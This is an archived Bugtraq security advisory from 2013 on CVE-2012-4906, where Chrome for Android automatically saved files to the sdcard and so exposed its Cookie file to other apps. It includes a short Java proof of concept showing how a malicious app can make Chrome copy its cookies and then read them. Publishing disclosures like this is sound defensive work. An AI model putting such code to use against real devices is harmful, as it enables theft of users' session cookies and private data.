lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201301071325.r07DPAc6031950@sf01web2.securityfocus.com>
Date: Mon, 7 Jan 2013 13:25:10 GMT
From: mbsdtest01@...il.com
To: bugtraq@...urityfocus.com
Subject: Chrome for Android - Download Function Information Disclosure

CVE Number:         CVE-2012-4906
Title:              Chrome for Android - Download Function Information Disclosure
Affected Software:  Confirmed on Chrome for Android v18.0.1025123
Credit:             Takeshi Terada
Issue Status:       v18.0.1025308 was released which fixes this vulnerability

Overview:
  Rogue Android apps can steal private information such as Cookie file of Chrome,
  by abusing automatic download functionality of Chrome for Android.

Details:
  When Chrome for Android (v18.0.1025123) loads non-renderable contents such as
  binary files, Chrome for Android automatically saves them in public place (sdcard)
  without asking the users whether they wish to do so or not.

  Therefore, malicious Android apps can steal such contents by below method.

  1. A malicious app forces Chrome to load such contents.
  2. Chrome automatically save it to sdcard.
  2. The malicious app read the downloaded file in sdcard.

  By this method, malicious apps can gain access to both local contents such as
  the Cookie file of Chrome, and possibly online contents.

  Such behaivior of Chrome does not matter in PC world, but it does in Android
  world, because they are different in security model.

Proof of Concept:
  // This is a part of malicious Android app.
  public void attack() {
    try {
      // let Chrome app load its Cookies file, so that Chrome app
      // automatically save it to /sdcard/Download/ directory.
      Intent intent = new Intent("android.intent.action.VIEW");
      intent.setClassName("com.android.chrome", "com.google.android.apps.chrome.Main");
      intent.setData(Uri.parse("file:///data/data/com.android.chrome/app_chrome/Default/Cookies"));
      startActivity(intent);
  
      // wait a few seconds
      Thread.sleep(3000);
  
      // read the Cookie file (/sdcard/Download/Cookies.bin)
      FileInputStream fis = new FileInputStream("/sdcard/Download/Cookies.bin");
      ...
  }

Timeline:
  2012/07/07  Reported to Google security team
  2012/08/25  Re-reported to Chrome security team
  2012/09/12  Vender announced v18.0.1025308
  2013/01/07  Disclosure of this advisory

Recommendation:
  Upgrade to the latest version.

Reference:
  http://googlechromereleases.blogspot.jp/2012/09/chrome-for-android-update.html
  https://code.google.com/p/chromium/issues/detail?id=144820

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ